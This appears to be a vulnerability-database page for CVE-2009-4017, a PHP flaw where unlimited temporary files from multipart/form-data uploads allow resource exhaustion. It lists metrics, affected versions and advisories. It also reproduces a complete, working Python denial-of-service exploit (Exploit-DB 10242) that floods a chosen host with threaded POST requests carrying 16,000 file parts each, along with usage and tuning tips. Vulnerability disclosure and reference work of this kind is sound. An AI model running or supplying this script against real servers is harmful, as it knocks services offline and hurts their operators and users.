CVE-2009-4017 : Detail

CVE-2009-4017

2.08%V4
Network
2009-11-23
23h00 +00:00
2018-10-10
16h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

PHP before 5.2.12 and 5.3.x before 5.3.1 does not restrict the number of temporary files created when handling a multipart/form-data POST request, which allows remote attackers to cause a denial of service (resource exhaustion), and makes it easier for remote attackers to exploit local file inclusion vulnerabilities, via multiple requests, related to lack of support for the max_file_uploads directive.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-770 Allocation of Resources Without Limits or Throttling
The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 10242

Publication date : 2009-11-26 23h00 +00:00
Author : Eren
EDB Verified : Yes

#!/usr/bin/python # -*- coding: utf-8 -*- # # Author: # Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20 # http://www.pardus.org.tr/eng/ # # Credits: # Bogdan Calin from Acunetix # # Description: # Exploit to cause denial of service on any host that runs PHP via temporary # file exhaustion. It doesn't matter whether the script handles uploads or not. # If host runs PHP, it is enough to cause DoS using any PHP script it serves. # # This is the implementation of disclosed vulnerability that was found # by Bogdan Calin. See: http://www.acunetix.com/blog/websecuritynews/php-multipartform-data-denial-of-service/ # # Affected versions: # All PHP versions before PHP 5.3.1 and unpatched 5.2.11 # # Platforms: # Windows, Linux, Mac # # Fix: # Update to 5.3.1. If you use 5.2.11 and can't update, apply the patch [0]: # # [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/rfc1867.c?r1=272374&r2=289990&view=patch (introduce max_file_upload) # [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c?r1=289214&r2=289990&view=patch (NOTE: upstream changed 100 to 20, do it so) # # Usage: # python php-multipart-dos.py <site> <port> </index.php> <num of child: optional> # # After opening childs, you may wait long for threads to finish because sending such a huge data is painful. # However, it's not important to finish the request. Openining lots of connections and sending huge data fastly will enough to cause DoS. # So the more threads you spawn, the more impact you will make. In normal cases, spawning 150 childs would be enough. But the number depends on you. # Trial and error ;)) # # Example: # python php-multipart-dos.py www.example.com 8080 /index.php # # By defalt, the program will create 100 threads, each thread will send 10 requests. # You can specify child number to create, you may want to increase or decrease for the impact, etc.. # # python php-multipart-dos.py www.example.com 80 /~user/index.php 50 # # Notes: # This script is for educational purposes only. Use it at your OWN risk! import socket import random import time import threading import sys class Connection: def __init__(self, host, port): self._host = host self._port = port self.sock = None def connect(self): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.connect((self._host, self._port)) def send(self, msg): if not self.sock: raise "NotConnected" else: self.sock.send(msg) def close(self): self.sock.close() class Exploit (threading.Thread): def __init__(self, host, port, target): self._host = host self._port = port self._target = target threading.Thread.__init__(self) def getBoundary(self): """ Return random boundary data """ random.seed() rnd = random.randrange(100000, 100000000) data = "---------------------------%s" % rnd return data def createPayload(self): data = """POST %(target)s HTTP/1.1\r Host: %(host)s\r Uset-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)\r Connection: keep-alive\r Content-Type: multipart/form-data; boundary=%(boundary)s\r Content-Length: %(length)s\r\n\r\n""" boundary = self.getBoundary() # Create a number of upload data, 16.000, yeah! :) for i in range(16000): data += "--%s\r\n" % boundary data += """Content-Disposition: form-data; name="file_%s"; filename="file_%s.txt"\r Content-Type: text/plain\r\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. In non blandit augue.\n\r\n""" % (i, i) data += "--%s--\r\n" % boundary return data % {"host": self._host, "target": self._target, "boundary": boundary, "length": str(len(data))} def run(self): payload = self.createPayload() for i in range(0, 10): c = Connection(self._host, self._port) c.connect() c.send(payload) c.close() sys.exit(0) del payload sys.exit(0) def usage(): usage_data = """ __^__ __^__ ( ___ )------------------------------------------------( ___ ) | / | | \ | | / | Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20 | \ | | / | http://www.pardus.org.tr/eng/ | \ | |___| |___| (_____)------------------------------------------------(_____) PHP denial of service exploit via temporary file exhaustion Usage: python php-multipart-dos.py <host> <port> </adress/index.php> <child number: optional> See source code for more information """ print usage_data if __name__ == '__main__': if not len(sys.argv) >= 4: usage() else: # is child number passed? if len(sys.argv) >= 5: child = int(sys.argv[4]) else: child = 100 print "[+] Attack started..." for i in range(0, child): try: exp = Exploit(str(sys.argv[1]), int(sys.argv[2]), str(sys.argv[3])) exp.start() print "[+] Opening %s childs... [%s]\r" % (child, i+1), sys.stdout.flush() i += 1 except KeyboardInterrupt: print "\n[-] Keyboard Interrupt. Exiting..." sys.exit(1) # print it so that previous "Opening childs..." is still there print "" while True: try: activeChilds = threading.activeCount() print "[+] Waiting for childs to finish. %d remaining...\r" % activeChilds, sys.stdout.flush() # we have one main process if activeChilds == 1: print "\nOK!" sys.exit(0) except KeyboardInterrupt: print "\n[-] Exiting without waiting!" sys.exit(1)

Products Mentioned

Configuraton 0

Php>>Php >> Version To (excluding) 5.2.12

Php>>Php >> Version 5.3.0

Php>>Php >> Version 5.3.0

Php>>Php >> Version 5.3.0

Php>>Php >> Version 5.3.0

Php>>Php >> Version 5.3.0

Php>>Php >> Version 5.3.0

Php>>Php >> Version 5.3.0

Php>>Php >> Version 5.3.0

Php>>Php >> Version 5.3.0

Configuraton 0

Apple>>Mac_os_x >> Version 10.6.3

Debian>>Debian_linux >> Version 4.0

Debian>>Debian_linux >> Version 5.0

Debian>>Debian_linux >> Version 6.0

References

http://www.php.net/releases/5_2_12.php
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/37482
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/40262
Tags : third-party-advisory, x_refsource_SECUNIA
http://news.php.net/php.announce/79
Tags : mailing-list, x_refsource_MLIST
http://marc.info/?l=bugtraq&m=127680701405735&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.mandriva.com/security/advisories?name=MDVSA-2009:305
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/37821
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/41490
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2009/dsa-1940
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.php.net/ChangeLog-5.php
Tags : x_refsource_CONFIRM
http://www.openwall.com/lists/oss-security/2009/11/20/7
Tags : mailing-list, x_refsource_MLIST
http://support.apple.com/kb/HT4077
Tags : x_refsource_CONFIRM
http://www.openwall.com/lists/oss-security/2009/11/20/2
Tags : mailing-list, x_refsource_MLIST
http://www.php.net/releases/5_3_1.php
Tags : x_refsource_CONFIRM
http://www.vupen.com/english/advisories/2009/3593
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/41480
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=127680701405735&w=2
Tags : vendor-advisory, x_refsource_HP
http://seclists.org/fulldisclosure/2009/Nov/228
Tags : mailing-list, x_refsource_FULLDISC
http://www.mandriva.com/security/advisories?name=MDVSA-2009:303
Tags : vendor-advisory, x_refsource_MANDRIVA